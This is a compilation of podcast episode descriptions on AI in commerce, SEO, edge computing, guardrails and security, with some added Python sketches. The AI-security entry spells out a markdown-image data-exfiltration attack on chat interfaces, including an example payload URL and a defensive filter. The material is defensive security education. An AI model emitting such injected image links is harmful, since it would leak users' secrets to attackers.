Pano serves as a founding member of XRC Ventures, an investment firm operating at the intersection of consumer behavior and technology. His expertise spans venture capital, retail innovation, and emerging technology trends that impact how businesses connect with customers. Pano's investment philosophy centers on understanding consumer adoption patterns to predict corporate technology trends. He's particularly focused on agentic AI applications across supply chain management, customer support, and e-commerce optimization. His insights come from years of observing how consumers embrace new technologies before enterprises catch up. Throughout his career, Pano has maintained that studying consumer behavior provides the clearest roadmap for understanding where business technology is headed next.
Episode Summary
Pano explains why XRC Ventures focuses on consumer behavior as a predictor of technological advancement. "Consumers are responsible for two trillion in spend and a massive portion of our GDP," he explains. "They tend to be relatively much faster early adopters of technology than corporations." This philosophy drives their investment strategy and provides unique insights into market direction.
When discussing agentic AI, Pano breaks down the concept into four essential components: autonomous planning, adaptive reasoning, tool integration, and goal orientation. "AI to figure out the rules. You have to really lay out the rules first," he emphasizes.
"That's the misconception of autonomous AI, that it will make decisions within boundaries. But you have to set those boundaries or you get nothing."
The conversation takes a practical turn as Pano shares examples of agentic AI in action. He describes an investment opportunity involving supply chain automation where AI intercepts and processes manufacturer communications. "There's a very set of manual tasks today," he explains. "This team out of Israel has figured out how to automate using an LLM to basically take all those messages they're going back and forth and make decisions based on the rules that have been set by the organization."
For small e-commerce businesses, Pano delivers stark advice about the changing landscape. "Your website is toast," he warns. "Unless you are a fashion-oriented product where discovery is important and inspiration is important and it's truly discretionary, the chat engines are going to take over." He demonstrates this point using Perplexity Shopping, showing how consumers can research, compare, and purchase products without ever visiting a brand's website.
The discussion reveals how AI-powered shopping platforms threaten traditional cross-selling strategies. "You are, you know, for that transaction, yes. To build some brand awareness, maybe. Cross-sell, absolutely not," Pano states. This fundamental shift forces businesses to reconsider their entire customer acquisition and retention strategies.
Pano's advice for content teams reflects the urgency of this transition: "Start using the engines and asking all the questions that any consumer would, and they give you all the questions that consumers can ask, and go figure out whether you're in the top three or top one or top two." He stresses the importance of understanding where brands rank in AI responses and working backward to improve visibility in source content.
The conversation concludes with predictions about Google's future.
"The judges in the trial that just came out last week or two weeks ago, it's pretty obvious that the judge knows that what we all know is Google search in the traditional SEO, SEM world, it's over," Pano observes. He compares Google's potential fate to previous tech giants, noting how quickly market leaders can become irrelevant when disrupted by superior technology.
Key Takeaways
• Consumer adoption drives innovation: Consumers spend two trillion dollars annually and adopt technology faster than corporations, making them the ultimate predictor of future trends
• Process documentation is crucial: Successful AI implementation requires clearly defined rules and boundaries before automation can begin
• Reddit has become the new SEO: Chat engines prioritize Reddit content over traditional website reviews, fundamentally changing how brands build credibility
• Website traffic will decline dramatically: Hard goods businesses face inevitable traffic drops as consumers turn to AI-powered shopping experiences
• Transparency is the new currency: AI engines expose product quality issues that brands previously could hide through marketing
• Google's dominance faces serious threats: Traditional search is being replaced by conversational AI interfaces that provide instant, comprehensive answers
Final Thoughts
The retail revolution isn't coming—it's already here, reshaping how consumers discover, evaluate, and purchase products. Pano Anthos delivers a clear message: businesses must abandon traditional web-centric strategies and embrace AI-powered commerce platforms or risk obsolescence. The winners won't be those with the prettiest websites but those who understand how to position themselves effectively within AI-driven discovery systems.
As we navigate this transformation, one question remains: will your business become an agent of change or merely another victim of technological disruption?
Connect with XRC Ventures:
https://xrcventures.com
https://www.linkedin.com/company/xrcventures
https://www.instagram.com/xrcventures
Follow Talk Commerce on your favorite platform:
YouTube: https://www.youtube.com/@talkcommerce
Bluesky: https://bsky.app/profile/talkcommerce.bsky.social
Apple Podcasts: https://podcasts.apple.com/us/podcast/talk-commerce/id1561204656
Spotify: https://open.spotify.com/show/7Alx6N7ERrPEXIBb41FZ1n
Twitter: @talkingcommerce
LinkedIn: https://www.linkedin.com/company/talk-commerce
Facebook: https://www.facebook.com/talkingcommerce
Website: https://talk-commerce.com/
This is a recap of the top 10 posts on Hacker News on September 30, 2025. This podcast was generated by wondercraft.ai
(00:30): Kagi News
Original post: https://news.ycombinator.com/item?id=45426490&utm_source=wondercraft_ai
(01:50): Sora 2
Original post: https://news.ycombinator.com/item?id=45427982&utm_source=wondercraft_ai
(03:11): I've removed Disqus. It was making my blog worse
Original post: https://news.ycombinator.com/item?id=45423268&utm_source=wondercraft_ai
(04:32): Comprehension debt: A ticking time bomb of LLM-generated code
Original post: https://news.ycombinator.com/item?id=45423917&utm_source=wondercraft_ai
(05:53): Inflammation now predicts heart disease more strongly than cholesterol
Original post: https://news.ycombinator.com/item?id=45430498&utm_source=wondercraft_ai
(07:14): Imgur pulls out of UK as data watchdog threatens fine
Original post: https://news.ycombinator.com/item?id=45424888&utm_source=wondercraft_ai
(08:35): Sora 2
Original post: https://news.ycombinator.com/item?id=45428122&utm_source=wondercraft_ai
(09:55): Leaked Apple M5 9 core Geekbench scores
Original post: https://news.ycombinator.com/item?id=45427197&utm_source=wondercraft_ai
(11:16): Bcachefs removed from the mainline kernel
Original post: https://news.ycombinator.com/item?id=45423004&utm_source=wondercraft_ai
(12:37): Boeing has started working on a 737 MAX replacement
Original post: https://news.ycombinator.com/item?id=45428482&utm_source=wondercraft_ai
This is a third-party project, independent from HN and YC. Text and audio generated using AI, by wondercraft.ai. Create your own studio quality podcast with text as the only input in seconds at app.wondercraft.ai. Issues or feedback? We'd love to hear from you: team@wondercraft.ai
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
LLM-based discovery won't replace traditional search within 12 months. Guy Yalif, Webflow's enterprise search strategist, argues that probabilistic and deterministic answers will merge rather than compete, with Google maintaining significant advantages through superior data access and brand recognition. The discussion covers Google's strategic integration of Gemini across productivity platforms and the emerging multi-trillion dollar battle between OpenAI and Google for personalized AI assistant dominance.See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
Can we have a normal conversation about AI? Brian talks with Meghan Sullivan about the effect of rapidly advancing technology on human dignity and our understanding of the imago Dei. Dr. Brian Doak is an Old Testament scholar and professor. Meghan Sullivan is a decorated scholar and teacher at the University of Notre Dame, where she is professor of philosophy.
Check out the opening ND Summit Keynote on the DELTA Framework and the Institute for Ethics and the Common Good.
New York Times article: Finding God in the App Store
If you enjoy listening to the George Fox Talks podcast and would like to watch, too, check out our channel on YouTube! We also have a web page that features all of our podcasts, a sign-up for our weekly email update, and publications from the George Fox University community.
In this episode, we talk about practical guardrails for LLMs with data scientist Nicholas Brathwaite. We focus on how to stop PII leaks, retrieve data, and evaluate safety with real limits. We weigh managed solutions like AWS Bedrock against open-source approaches and discuss when to skip LLMs altogether.
• Why guardrails matter for PII, secrets, and access control
• Where to place controls across prompt, training, and output
• Prompt injection, jailbreaks, and adversarial handling
• RAG design with vector DB separation and permissions
• Evaluation methods, risk scoring, and cost trade-offs
• AWS Bedrock guardrails vs open-source customization
• Domain-adapted safety models and policy matching
• When deterministic systems beat LLM complexity
This episode is part of our “AI in Practice” series, where we invite guests to talk about the reality of their work in AI. From hands-on development to scientific research, be sure to check out other episodes under this heading in our listings.
Related research:
Building trustworthy AI: Guardrail technologies and strategies (N. Brathwaite)
Nic's GitHub
What did you think? Let us know.
Do you have a question or a discussion topic for the AI Fundamentalists? Connect with them to comment on your favorite topics:
LinkedIn - Episode summaries, shares of cited articles, and more.
YouTube - Was it something that we said? Good. Share your favorite quotes.
Visit our page - see past episodes and submit your feedback! It continues to inspire future episodes.
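As a concrete illustration of the first bullet, here is a minimal regex-based PII filter of the kind you might place on prompts or model output. It is a sketch only: managed guardrails such as AWS Bedrock's, and the approaches discussed in the episode, rely on NER models and policy engines rather than a few regexes, and the patterns and placeholder labels below are illustrative assumptions.

```python
import re

# Minimal sketch of a PII guardrail applied to prompts or model output.
# Patterns and placeholder tokens are illustrative, not a product's API.

PII_PATTERNS = {
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "PHONE": re.compile(r"\b(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b"),
}

def redact(text: str) -> str:
    # Replace each detected entity with a typed placeholder so the
    # downstream LLM still sees grammatical text.
    for label, pattern in PII_PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text

print(redact("Contact jane.doe@example.com or 555-867-5309."))
# -> Contact [EMAIL] or [PHONE].
```

A filter like this sits at the "where to place controls" decision point: run it on input before retrieval, and again on output before anything is logged or shown.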
In this episode, we spoke with Sean Hehir, CEO, and Jonathan Tapson, Chief Development Officer, of BrainChip about neuromorphic computing for edge AI. We covered why event-based processing and sparsity let devices skip 99% of useless sensor data, why joules per inference is a more honest metric than TOPS, how PPA (power, performance, area) guides on-device design, and what it will take to run a compact billion-parameter LLM entirely on device. We also discussed practical use cases like seizure-prediction eyewear, drones for beach safety, and efficiency upgrades in vehicles, plus BrainChip's adoption path via MetaTF and its IP-licensing business model.
Key insights:
• Neuromorphic efficiency. Event-based compute minimizes data transfer and optimizes for joules per inference, enabling low-power, real-time applications in medical, defense, industrial IoT, and automotive.
• LLMs at the edge. Compact silicon and state-based designs are pushing billion-parameter models onto devices, achieving useful performance at much lower power.
• Adoption is designed to be straightforward. Models built in standard frameworks can be mapped to BrainChip's Akida platform using MetaTF, with PPA guiding silicon optimization and early evaluation possible through simulation and dev kits.
• Compelling use cases. Examples include seizure-prediction smart glasses aiming for all-day battery life in a tiny form factor and drones scanning beaches for distressed swimmers. Most current engagements are pure on-edge, with hybrid edge-plus-cloud possible when appropriate.
IoT ONE database: https://www.iotone.com/case-studies
The Industrial IoT Spotlight podcast is produced by Asia Growth Partners (AGP): https://asiagrowthpartners.com/
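The joules-per-inference point is easy to make concrete: energy per inference is just average power times time per inference, so a chip with far lower raw throughput can still win decisively. The numbers below are illustrative assumptions, not BrainChip measurements.

```python
# Back-of-envelope sketch of why joules per inference can be a more
# honest metric than TOPS. All figures are made-up illustrations.

def joules_per_inference(power_watts: float, latency_s: float) -> float:
    # Energy = average power draw * time spent on one inference.
    return power_watts * latency_s

# A "fast" accelerator with a high TOPS rating but a 30 W draw:
cloud_style = joules_per_inference(power_watts=30.0, latency_s=0.005)
# An event-based edge chip, slower per inference but sipping power:
edge_style = joules_per_inference(power_watts=0.05, latency_s=0.02)

print(f"{cloud_style:.4f} J vs {edge_style:.4f} J per inference")
# The edge chip uses roughly 150x less energy per answer, a gap the
# TOPS numbers alone would never reveal.
```

For battery-bound designs like the seizure-prediction glasses, that ratio, not peak throughput, determines whether all-day operation is feasible.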
In this episode we interview Mick Essex, Head of Growth Marketing at Powr. He shows how small teams turn repeatable work into time-saving custom GPTs that actually ship. See Powr's custom GPTs.
What you'll learn in this episode:
• The simple rule to decide prompt vs GPT: when you repeat a similar prompt three times, make a GPT instead.
• How adding a clear knowledge base and iterating with “always” and “never” instructions sharpens results fast.
• A blueprint for an Article Draft Inspector that checks meta titles, FAQs, and image alt text—scaling edits from a few per day to dozens.
• An A/B sample sizer that prevents bad data by calculating the right audience and duration before you test.
• An email spam checker that flags risky words, suggests safer language, and can rewrite the message on the spot.
• An AEO optimizer that reads page source and suggests schema and copy tweaks to earn AI citations.
• A GA4 assistant concept that maps LLM citations and ties them to conversions with step-by-step explorations.
• How “Ninja teams” pair an engineer, PM, marketer, and support to build connectors without bloat.
• Why many of Mick's GPTs are public—and why the GPT Store options are free.
• A fast start: list the repetitive, time-heavy tasks, explain the problem and time cost, then ask ChatGPT to convert it into a custom GPT.
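The A/B sample sizer Mick describes boils down to a standard two-proportion power calculation. A sketch in Python, where the formula and the alpha/power defaults are textbook conventions, not Powr's actual GPT logic:

```python
from math import sqrt, ceil
from statistics import NormalDist

# Textbook two-proportion sample-size formula; illustrative defaults.

def ab_sample_size(p1: float, p2: float, alpha: float = 0.05,
                   power: float = 0.8) -> int:
    """Visitors needed *per variant* to detect a lift from p1 to p2."""
    z_a = NormalDist().inv_cdf(1 - alpha / 2)   # two-sided significance
    z_b = NormalDist().inv_cdf(power)           # desired statistical power
    p_bar = (p1 + p2) / 2
    num = (z_a * sqrt(2 * p_bar * (1 - p_bar))
           + z_b * sqrt(p1 * (1 - p1) + p2 * (1 - p2))) ** 2
    return ceil(num / (p1 - p2) ** 2)

# Detecting a lift from a 3% to a 4% conversion rate:
n = ab_sample_size(0.03, 0.04)
print(n, "visitors per variant")
```

Dividing the result by your daily traffic per variant gives the test duration such a GPT would recommend, which is how it "prevents bad data" from underpowered tests.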
On-Device AI Agents in Production: Privacy, Performance, and Scale // MLOps Podcast #340 with NimbleEdge's Varun Khare, Founder/CEO and Neeraj Poddar, Co-founder & CTO.
Join the Community: https://go.mlops.community/YTJoinIn
Get the newsletter: https://go.mlops.community/YTNewsletter
// Abstract
AI agents are transitioning from experimental stages to performing real work in production; however, they have largely been limited to backend task automation. A critical frontier in this evolution is the on-device AI agent, enabling sophisticated, AI-native experiences directly on mobile and embedded devices. While cloud-based AI faces challenges like constant connectivity demands, increased latency, privacy risks, and high operational costs, on-device AI breaks through these trade-offs.
We'll delve into the practical side of building and deploying AI agents with “DeliteAI”, an open-source on-device AI agentic framework. We'll explore how lightweight Python runtimes facilitate the seamless orchestration of end-to-end workflows directly on devices, allowing AI/ML teams to define data preprocessing, feature computation, model execution, and post-processing logic independently of frontend code. This architecture empowers agents to adapt to varying tasks and user contexts through an ecosystem of tools natively supported on Android/iOS platforms, handling permissions, model lifecycles, and much more.
// Bio
Varun Khare
Varun is the Founder and CEO of NimbleEdge, an AI startup pioneering privacy-first, on-device intelligence. With an academic foundation in AI and neuroscience from UC Berkeley, MPI Frankfurt, and IIT Kanpur, Varun brings deep expertise at the intersection of technology and science. Before founding NimbleEdge, Varun led open-source projects at OpenMined, focusing on privacy-aware AI, and published research in computer vision.
Neeraj Poddar
Neeraj Poddar is the Co-founder and CTO at NimbleEdge.
Prior to NimbleEdge, he was the Co-founder of Aspen Mesh, VP of Engineering at Solo.io, and led the Istio open source community. He has worked on various aspects of AI, networking, security, and distributed systems over the span of his career. Neeraj focuses on the application of open source technologies across different industries in terms of scalability and security. When not working on AI, you can find him playing racquetball and gaining back the calories spent playing by trying out new restaurants.
// Related Links
Website: https://www.nimbleedge.com/
https://www.nimbleedge.com/blog/why-ai-is-not-working-for-you
https://www.nimbleedge.com/blog/state-of-on-device-ai
https://www.youtube.com/watch?v=Qqj_Nl2MihE
https://www.linkedin.com/events/7343237917982527488/comments/
~~~~~~~~ ✌️Connect With Us ✌️ ~~~~~~~
Catch all episodes, blogs, newsletters, and more: https://go.mlops.community/TYExplore
Join our Slack community: https://go.mlops.community/slack
Follow us on X/Twitter: https://x.com/mlopscommunity or LinkedIn: https://go.mlops.community/linkedin
Sign up for the next meetup: https://go.mlops.community/register
MLOps Swag/Merch: https://shop.mlops.community/
Connect with Demetrios on LinkedIn: /dpbrinkm
Connect with Varun on LinkedIn: /vkkhare/
Connect with Neeraj on LinkedIn: /nrjpoddar/
Timestamps:
[00:00] On-device AI skepticism
[02:47] Word suggestion for AI
[06:40] Optimizing unique challenges
[13:39] LLM on-device challenges
[20:34] Agent overlord tension
[23:56] AI app constraints
[29:23] Siri limitations and trust gap
[32:01] Voice-driven app privacy
[35:49] Platform lock-in vs aggregation
[42:26] On-device AI optimizations
[45:38] Wrap up
In this episode we looked not only at Apple's new products but also at the broader context of technological change. The hosts analyzed the company's decision to return from titanium to aluminum in the iPhone, discussed the new health-monitoring features in AirPods Pro, and covered the live-translation capabilities. A separate segment is devoted to the revolutionary youth movement in Nepal, where social media and the Discord platform enabled large-scale political change. We also analyze the initiative to create a national LLM in Ukraine, assess the risks of developing models in wartime, and highlight the problems of privacy, monopolies, and inefficient use of public funds. Questions about how companies collect and use data are becoming critically important, and consumers should know exactly how their information is processed.
00:23 — Apple's new products
02:37 — sound quality and the evolution of audio technology
04:57 — features of the new devices
07:20 — battery technology
09:10 — the role of technology in political movements
15:40 — digital transformation and data security
19:30 — the growing role of AI and its consequences
23:04 — development of a national LLM in Ukraine
31:32 — technical infrastructure and data centers
34:07 — right to repair and corporate control
43:38 — data privacy and consumer rights
46:29 — challenges and innovation in the gaming industry
Today on the show I share my current thoughts on AI and LLM usage in the automotive repair space as of September 2025. Where are these tools most useful for me? What do you need to know to make the most out of them? What are some of the potential pitfalls?
Website- https://autodiagpodcast.com/
Facebook Group- https://www.facebook.com/groups/223994012068320/
YouTube- https://www.youtube.com/@automotivediagnosticpodcas8832
Email- STmobilediag@gmail.com
Please make sure to check out our sponsors!
SJ Auto Solutions- https://sjautosolutions.com/
Automotive Seminars- https://automotiveseminars.com/
L1 Automotive Training- https://www.l1training.com/
Autorescue tools- https://autorescuetools.com/
Why you should listen
• Garima Agrawal bridges the gap between PhD-level AI research and practical consulting applications—she understands both the Formula One engine and how to help you drive the car better.
• Learn the layered prompting technique that eliminates most hallucinations and turns ChatGPT into a thinking partner rather than a content generator you can't trust.
• Discover which LLM to use for specific tasks—ChatGPT for analysis, Claude for coding, Gemini for technical research, and Perplexity for citations—so you stop wasting time with the wrong tool.
You're using ChatGPT every day, but deep down you don't fully trust it. You've been burned by hallucinations. You watch it confidently give you wrong information, and you're left wondering which parts are reliable and which parts are fiction. You know AI should be making you more productive, but instead you're second-guessing every output and spending more time fact-checking than creating. Meanwhile, you see other consultants talking about Claude, Gemini, Perplexity—and you're not sure if you should be using those instead or if ChatGPT is fine. You're stuck in this loop of knowing AI is powerful but not knowing how to harness it properly.
This week, I sat down with Garima Agrawal, who brings a rare combination: PhD-level AI research expertise and real-world consulting experience running her own firm. She breaks down the exact framework that eliminates most hallucinations, reveals which LLM actually performs best for specific consulting tasks, and shares the prompting mistakes that sabotage your results before you even start. If you're ready to stop fighting with AI and start using it as the leverage tool it should be, this conversation gives you the practical roadmap you need.
About Garima Agrawal
Garima Agrawal is the founder of HumaConn LLC, a consulting firm focused on empowering businesses and investors with tailored AI solutions.
At HumaConn, she specializes in designing strategies for effective AI integration—helping clients enhance efficiency, streamline operations, and identify high-potential AI-driven opportunities that bridge innovation with real-world impact.
She also serves as Head of AI Models and Services at Minerva CQ, where she leads the development and deployment of real-time, goal-oriented AI systems that power agentic, human-in-the-loop assistance in customer contact centers—boosting engagement and operational performance.
Garima holds a Ph.D. in Artificial Intelligence from Arizona State University, where her research focused on making AI knowledge-aware—enabling large language models to reason reliably in specialized domains. Her core expertise includes reducing hallucinations, optimizing retrieval-augmented generation (RAG), and building cost-effective, trustworthy AI pipelines.
With over a decade of experience spanning software engineering, data science, and AI leadership, Garima bridges the gap between cutting-edge research and real-world application—helping organizations build AI that delivers meaningful, measurable results.
Resources and Links
Humaconn.com
Garima's LinkedIn profile
Garima's Google Scholar profile
ChatGPT
Claude
Gemini
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
LLM-based discovery won't replace traditional search within 12 months. Guy Yalif, SEO leader at Webflow, shares insights on how probabilistic and deterministic search approaches will merge rather than compete. The discussion covers Google's strategic advantage through Gemini integration across their ecosystem and the emerging multi-trillion dollar battle between OpenAI and Google for AI assistant dominance.See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
Cerebrium is a serverless AI infrastructure platform orchestrating CPU and GPU compute for companies building voice agents, healthcare AI systems, manufacturing defect detection, and LLM hosting. The company operates across global markets, handling data residency constraints from GDPR to Saudi Arabia's data sovereignty requirements. In a recent episode of Category Visionaries, I sat down with Michael Louis, Co-Founder & CEO of Cerebrium, to explore how they built a high-performance infrastructure business serving enterprise customers with high five-figure to six-figure ACVs while maintaining 99.9%+ SLA requirements.
Topics Discussed:
• Building AI infrastructure before the GPT moment and strategic patience during the hype cycle
• Scaling a distributed engineering team between Cape Town and NYC with 95% South African talent
• Partnership-driven revenue generation producing millions in ARR without traditional sales teams
• AI-powered market engineering achieving 35% LinkedIn reply rates through competitor analysis
• Technical differentiation through cold start optimization and network latency improvements
• Revenue expansion through global deployment and regulatory compliance automation
GTM Lessons For B2B Founders:
Treat go-to-market as a systems engineering problem: Michael reframed traditional sales challenges through an engineering lens, focusing on constraints, scalability, and data-driven optimization. "I try to reframe my go to market problem as an engineering one and try to pick up, okay, like what are my constraints? Like how can I do this, how can it scale?" This systematic approach led to testing 8-10 different strategies, measuring conversion rates, and building automated pipelines rather than relying on manual processes that don't scale.
Structure partnerships for partner success before revenue sharing: Cerebrium generates millions in ARR through partners whose sales teams actively upsell their product.
Their approach eliminates typical partnership friction: "We typically approach our partners saying like, look, you keep the money you make, we'll keep the money we make. If it goes well, we can talk about like rev share or some other agreement down the line." This removes the commission complexity that kills B2B partnerships and allows partners to focus on customer value rather than internal revenue allocation conflicts.
Build AI-powered competitive intelligence for outbound at scale: Cerebrium's 35% LinkedIn reply rate comes from scraping competitor followers and LinkedIn engagement, running prospects through qualification agents that check funding status, ICP fit, and technical roles, then generating personalized outreach referencing specific interactions. "We saw you commented on Michael's post about latency in voice. Like, we think that's interesting. Like, here's a case study we did in the voice space." The system processes thousands of prospects while maintaining a personalization depth that manual processes can't match.
Position infrastructure as revenue expansion, not cost optimization: While dev tools typically focus on developer productivity gains, Cerebrium frames their value proposition around market expansion and revenue growth. "We allow you to deploy your application in many different markets globally... go to market leaders love us and sales leaders because again we open up more markets for them and more revenue without getting their tech team involved." This messaging resonates with revenue stakeholders and justifies higher spending compared to pure cost-reduction positioning.
Weaponize regulatory complexity as competitive differentiation: Cerebrium abstracts data sovereignty requirements across multiple jurisdictions - GDPR in Europe, data residency in Saudi Arabia, and other regional compliance frameworks. "As a company to build the infrastructure to have data sovereignty in all these companies and markets, it's a nightmare."
By handling this complexity, they create significant switching costs and enable customers to expand internationally without engineering roadmap dependencies, making them essential to sales teams pursuing global accounts.
// Sponsors:
Front Lines — We help B2B tech companies launch, manage, and grow podcasts that drive demand, awareness, and thought leadership. www.FrontLines.io
The Global Talent Co. — We help tech startups find, vet, hire, pay, and retain amazing marketing talent that costs 50-70% less than the US & Europe. www.GlobalTalent.co
// Don't Miss: New Podcast Series — How I Hire
Senior GTM leaders share the tactical hiring frameworks they use to build winning revenue teams. Hosted by Andy Mowat, who scaled 4 unicorns from $10M to $100M+ ARR and launched Whispered to help executives find their next role.
Subscribe here: https://open.spotify.com/show/53yCHlPfLSMFimtv0riPyM
David Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.
• LLMs present unique security challenges beyond prompt injection or generating harmful content
• Traditional security models focusing on component-based permissions don't work with AI systems
• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior
• Real-world examples include data exfiltration through markdown image rendering in AI interfaces
• Security "guardrails" are insufficient first-order controls for protecting AI systems
• The education gap between security professionals and actual AI threats is substantial
• Organizations must shift from component-based security to data flow security when implementing AI
• Development teams need to ensure high-trust AI systems only operate with trusted data
Watch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.
Support the show
Follow the Podcast on Social Media!
Tesla Referral Code: https://ts.la/joseph675128
YouTube: https://www.youtube.com/@securityunfilteredpodcast
Instagram: https://www.instagram.com/secunfpodcast/
Twitter: https://twitter.com/SecUnfPodcast
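The markdown-image exfiltration example is worth spelling out: if injected instructions make the model emit an image whose URL embeds stolen context, the chat UI auto-fetches the image and the attacker's server logs the secret. A minimal sketch of that source-sink chain and an output-side filter follows; the payload URL and allowlist host are hypothetical, and real mitigations need full markdown/HTML sanitization rather than one regex.

```python
import re

# Sketch of the markdown-image exfiltration channel and a minimal
# output filter. Payload and allowlist are hypothetical examples.

# An injected instruction can make the model emit an image whose URL
# embeds stolen context; a rendering UI then auto-fetches it:
leaked = "![x](https://attacker.example/log?secret=API_KEY_123)"

ALLOWED_HOSTS = ("files.internal.example",)  # hypothetical trusted host
IMG = re.compile(r"!\[[^\]]*\]\((https?://[^)]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    # Keep images only when their host is on the allowlist; replace
    # everything else before the UI gets a chance to fetch it.
    def check(match: re.Match) -> str:
        url = match.group(1)
        host = url.split("/")[2]
        return match.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMG.sub(check, markdown)

print(strip_untrusted_images(leaked))
# -> [image removed]
```

This is exactly the shift David describes: the control lives on the data flow between an untrusted source (model output shaped by attacker input) and a sensitive sink (the auto-fetching renderer), not on any single component's permissions.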
This show has been flagged as Explicit by the host.

Quick-Glance Summary

I walk you through an MIT experiment where 54 EEG-capped volunteers wrote essays three ways: pure brainpower, classic search, and ChatGPT assistance. Brain-only writers lit up the most neurons and produced the freshest prose; the ChatGPT crowd churned out near-identical essays, remembered little, and racked up what the researchers dub cognitive debt: the interest you pay later for outsourcing thought today. A bonus "switch" round yanked AI away from the LLM devotees (cue face-plant) and finally let the brain-first team play with the toy (they coped fine), proving skills first, tools second. I spiced the tale with calculator nostalgia, a Belgian med-exam cheating fiasco, and Professor Felienne's forklift-in-the-gym metaphor to land one mantra: *scaffolds beat shortcuts*. We peeked at tech "enshittification" once investors demand returns, whispered "open-source" as the escape hatch, and I dared you to try a two-day test—outline solo, draft with AI, revise solo, then check what you still remember. Net takeaway: keep AI on a leash; let thinking drive, tools navigate. If you think I'm full of digital hot air, record your own rebuttal and prove it.

Resources

MIT study:
MIT Media Lab. (2025). Your brain on ChatGPT: Accumulation of cognitive debt. https://www.media.mit.edu/publications/your-brain-on-chatgpt/

Long-term consequences (to be honest - pulled these from another list, didn't check all of them):
Clemente-Suárez, V. J., Beltrán-Velasco, A. I., Herrero-Roldán, S., Rodriguez-Besteiro, S., Martínez-Guardado, I., Martín-Rodríguez, A., & Tornero-Aguilera, J. F. (2024). Digital device usage and childhood cognitive development: Exploring effects on cognitive abilities. Children, 11(11), 1299. https://pmc.ncbi.nlm.nih.gov/articles/PMC11592547/
Grinschgl, S., Papenmeier, F., & Meyerhoff, H. S. (2021). Consequences of cognitive offloading: Boosting performance but diminishing memory. Quarterly Journal of Experimental Psychology, 74(9), 1477–1496. https://pmc.ncbi.nlm.nih.gov/articles/PMC8358584/
Ward, A. F., Duke, K., Gneezy, A., & Bos, M. W. (2017). Brain drain: The mere presence of one's own smartphone reduces available cognitive capacity. Journal of the Association for Consumer Research, 2(2), 140–154. https://www.journals.uchicago.edu/doi/full/10.1086/691462
Zhang, M., Zhang, X., Wang, H., & Yu, L. (2024). Understanding the influence of digital technology on cognitive development in children. Current Research in Behavioral Sciences, 5, 100224. https://www.sciencedirect.com/science/article/pii/S266724212400099X
Risko, E. F., & Dunn, T. L. (2020). Developmental origins of cognitive offloading. Developmental Review, 57, 100921. https://pubmed.ncbi.nlm.nih.gov/32517613/
Ladouceur, R. (2022). Cognitive effects of prolonged continuous human-machine interactions: Implications for digital device users. Behavioral Sciences, 12(8), 240. https://pmc.ncbi.nlm.nih.gov/articles/PMC10790890/
Wong, M. Y., Yin, Z., Kwan, S. C., & Chua, S. E. (2024). Understanding digital dementia and cognitive impact in children and adolescents. Neuroscience Bulletin, 40(7), 628–635. https://pmc.ncbi.nlm.nih.gov/articles/PMC11499077/
Baxter, B. (2025, February 2). Designing AI for human expertise: Preventing cognitive shortcuts. UXmatters. https://www.uxmatters.com/mt/archives/2025/02/designing-ai-for-human-expertise-preventing-cognitive-shortcuts.php
Tristan, C., & Thomas, M. (2024). The brain digitalization: It's all happening so fast! Frontiers in Human Dynamics, 4, 1475438. https://www.frontiersin.org/journals/human-dynamics/articles/10.3389/fhumd.2024.1475438/full
Sun, Z., & Wang, Y. (2024). Two distinct neural pathways for mechanical versus digital memory aids. NeuroImage, 121, 117245. https://www.sciencedirect.com/science/article/pii/S1053811924004683
Ahmed, S. (2025). Demystifying the new dilemma of brain rot in the digital era. Contemporary Neurology, 19(3), 241–254. https://pmc.ncbi.nlm.nih.gov/articles/PMC11939997/
Redshaw, J., & Adlam, A. (2020). The nature and development of cognitive offloading in children. Child Development Perspectives, 14(2), 120–126. https://srcd.onlinelibrary.wiley.com/doi/10.1111/cdep.12532
Geneva Internet Platform. (2025, June 3). Cognitive offloading and the future of the mind in the AI age. https://dig.watch/updates/cognitive-offloading-and-the-future-of-the-mind-in-the-ai-age
Karlsson, G. (2019). Reducing cognitive load on the working memory by externalizing information. DIVA Portal. http://www.diva-portal.org/smash/get/diva2:1327786/FULLTEXT02.pdf
Monitask. (2025). What is cognitive offloading? https://www.monitask.com/en/business-glossary/cognitive-offloading
Sharma, A., & Watson, S. (2024). Human technology intermediation to reduce cognitive load. Journal of the American Medical Informatics Association, 31(4), 832–841. https://academic.oup.com/jamia/article/31/4/832/7595629
Morgan, P. L., & Risko, E. F. (2021). Re-examining cognitive load measures in real-world learning environments. British Journal of Educational Psychology, 91(3), 993–1013. https://bpspsychub.onlinelibrary.wiley.com/doi/10.1111/bjep.12729

Podcast episodes that inspired some thoughts:
Felienne Hermans (NL)
Tech Won't Save Us
ScreenStrong Families

Provide feedback on this episode.
